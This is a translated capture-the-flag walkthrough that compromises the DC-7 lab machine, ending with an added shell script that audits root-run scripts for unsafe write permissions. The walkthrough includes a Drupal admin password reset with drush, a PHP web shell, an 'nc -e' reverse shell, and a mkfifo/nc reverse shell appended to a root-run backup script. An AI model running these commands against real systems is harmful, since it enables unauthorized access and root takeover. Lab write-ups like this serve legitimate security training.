DC-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
Find the host IP:
ifconfig
Sweep the internal network to detect live hosts:
nmap 192.168.61.0/24
Use nmap to scan the DC-5 target machine for open ports:
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Ports 22 and 80 are open.
There is a hint here: DC7USER
Search for it on Baidu.
A file can be downloaded.
This also shows that it is important.
Download it to the local Kali machine:
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
Connect to the target over SSH and log in as dc7user; the connection succeeds.
ls
This shows backups and mbox.
Under backups: website.sql.gpg website.tar.gz.gpg
Two files are found, but both end in .gpg. The gpg command is used to encrypt files, and the encrypted files are unreadable.
mbox is a file.
The source code that performs the backup is found in the /opt/scripts directory.
Go to the /opt/scripts directory:
cd /opt/scripts
View the file:
cat backups.sh
It contains two commands: gpg and drush.
The gpg command is used for encryption. drush is a command used in the Drupal framework for configuration tasks, and it can change the user name and password.
Go to the /var/www/html directory. Because the website will have an admin user, use the drush command to change the admin user's password to 123456. The change succeeds.
cd /var/www/html/
drush user-password admin --password="123456"
The admin password has been changed to 123456.
Use the dirb command to scan for pages:
dirb http://192.168.61.136
Under Content --> Add content --> Basic page, the plan was to add PHP code for a reverse shell, but PHP turned out not to be supported.
A Baidu search shows that PHP has to be imported as a separate module.
PHP module download address:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
Tick it, then click Install at the bottom.
After that it works.
Go back to the earlier page; PHP can now be used.
AntSword connects successfully.
Then listen on Kali:
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
The connection succeeds.
find / -name backups.sh 2>/dev/null
Then:
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
Root privileges obtained.
cd /root
ls
cat theflag.txt
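The last step works because a line appended to backups.sh from the web shell is later executed with root privileges, so the script was writable by an account other than root. The check below is an added example, not part of the original write-up: it flags a root-run script, or its directory, that a non-root account can modify. The function names are illustrative and GNU stat is assumed.

```shell
#!/bin/sh
# Added example: audit a script that root runs on a schedule.
# Usage: audit_script PATH [TRUSTED_OWNER]   (TRUSTED_OWNER defaults to root)
# On the target in this write-up: audit_script /opt/scripts/backups.sh
# Needs GNU stat (Linux). Prints one finding per line.
# Returns 0 if clean, 1 if anything was found, 2 if PATH does not exist.

# Report ownership and write-permission problems for one file or directory.
check_perms() {
    target=$1 trusted=$2 found=0
    info=$(stat -c '%U %G %a' "$target" 2>/dev/null) || return 2
    set -- $info                  # $1=owner  $2=group  $3=octal mode
    mode=$((0$3))                 # read the mode string as an octal number
    if [ "$1" != "$trusted" ]; then
        echo "$target: owned by $1, expected $trusted"; found=1
    fi
    if [ $((mode & 020)) -ne 0 ]; then
        echo "$target: writable by group $2"; found=1
    fi
    if [ $((mode & 002)) -ne 0 ]; then
        echo "$target: writable by everyone"; found=1
    fi
    return "$found"
}

audit_script() {
    script=$1 owner=${2:-root} rc=0
    [ -e "$script" ] || { echo "$script: not found" >&2; return 2; }
    # The file itself: whoever can write it decides what root executes.
    check_perms "$script" "$owner" || rc=$?
    # Its directory: write access there allows replacing the file outright.
    check_perms "$(dirname "$script")" "$owner" || rc=$?
    return "$rc"
}

# Run directly with a path argument to audit that script.
if [ "$#" -gt 0 ]; then
    audit_script "$@"
fi
```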